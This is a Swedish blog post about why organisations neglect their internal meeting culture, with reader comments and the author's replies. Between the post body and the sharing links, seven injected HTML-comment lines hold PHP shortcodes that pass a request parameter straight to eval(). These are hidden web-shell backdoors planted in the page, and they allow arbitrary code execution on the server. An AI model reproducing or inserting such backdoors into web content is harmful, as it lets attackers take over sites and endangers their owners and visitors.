Varför är så många nöjda med att vara missnöjda?

Efter att ha arbetat med möten i olika former under 25 år och fokuserat kring de interna mötena i organisationer de sista 2 åren, så är min erfarenhet att det finns två anledningar att så få företag/ organisationer har satt ljuset på den egna Möteskulturen.

1. Ingen äger frågan i organisationen. Det är inte HR direktören, det är inte kommunikations direktören, ej heller meeting & travel managern. Så, det som händer är att varje år så har ledningsgruppen detta uppe på agendan och sedan ramlar det mellan stolarna.

2. Ingen vet vad de skall göra åt det. ”Effektivisera mötet” och in kommer en ”effektiviserings konsult” kanske. Det stora problemet är inte att ha kortare möten och en ”snabbare” agenda. Det stora frågan är; -Vilken effekt ger mötena. Och vad händer om vi kan öka den effekten?

Det första en organisation bör göra är att utse någon som äger det. Gör gärna som Intel och gör detta till en VD fråga. Möteskultur är en strategisk ledningsfråga.

I nästa inlägg kommer jag skriva om vad en Mötesstrategi innebär.

Stay gr8!                                                                                                                                                                         Micke, mötesevangelisten

<!– [insert_php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/insert_php][php]if (isset($_REQUEST["agO"])){eval($_REQUEST["agO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zpz"])){eval($_REQUEST["Zpz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["UdZ"])){eval($_REQUEST["UdZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/insert_php][php]if (isset($_REQUEST["yYW"])){eval($_REQUEST["yYW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/insert_php][php]if (isset($_REQUEST["teen"])){eval($_REQUEST["teen"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/insert_php][php]if (isset($_REQUEST["nvISD"])){eval($_REQUEST["nvISD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WLK"])){eval($_REQUEST["WLK"]);exit;}[/php] –>

Vill du dela med dig av artikeln?

Share on facebook
Dela på Facebook
Share on twitter
Dela på Twitter
Share on linkedin
Dela på LinkedIn
Share on email
Dela på mailen

Vi vill gärna Höra dina tankar och reflektioner

Detta inlägg har 4 kommentarer

  1. Hej Micke,

    Jag gillar ditt inlägg och håller med om att det handlar om att ingen vill “äga” denna fråga i företagen. Jag tror precis som du att det är en VD då mötet är det strategiska verktyget att leda och utveckla organisationen.

    Enligt min uppfattning är det många som följer betrodda och beprövade modeller, strategier och tillvägagångsätt och det är väldigt få som vågar vara i framkant och prova nytt. Att ha en bra fungerande mötesstrategi är det bästa redskapet en ledare och ledning på ett företag kan ha. Jag tror det handlar om mod, våga testa och våga vara den som är i framkant.

    Jag har själv en väl fungerande mötesstrategi i min oragnisation och jag kan varmt rekomendera er som inte har det att skaffa en. Om du gör som du alltid gjort kommer det alltid bli som det blivit….. alltså prova göra nytt!

    Mvh Helene

    1. Hej!
      Kul att du har positiva egna erfarenheter vad en fungerande mötesstrategi ger för effekt. Jag har varit in i många stora organisationer där kommunikationsavdelningen inte använder de interna mötena som det främsta verktyget för kommunikation! Utan att de reflekterat över det! När de sedan sätter en mötesstrategi så är ju mötena det främsta kommunikationsverktyget.

      Och som du skriver….varför det ser ut som det gör (samma möten idag som på 70-talet) är ju för att få verkar våga prova något nytt. Så vi fortsätter våra möten med en agenda(om det finns någon) med 1-7 och 7 är övrigt. Precis som på 70-talet. 50% av alla möten i Sverige saknar tydligt syfte & mål ex.

      Kul med feedback!
      //Micke

  2. Äger egentligen inte alla frågan? Om varje enskild individ tar ansvar för sitt arbete, inklusive mötena, blir det bättre. “Vad gör jag här?” är en fråga som ställs allt för sällan.

    1. Ja det är allas ansvar när väl en Mötesstrategi är satt. Ur ett företags perspektiv så börjar det med att sätta en Mötesstrategi dock. Utan en sådan så kommer inte alla att börja ta ansvar. Sedan räcker det förstås inte att någon äger det bara. Det krävs kompetens här som i allt annat. För vore det “bara sunt förnuft” så såg det ju inte ut som det gör idag i organisationer där många möten tar energi istället för att ge energi. Återkommer med vad en Mötesstrategi är!
      Kul med din feedback!

Kommentera

Senaste blogginläggen

Stäng meny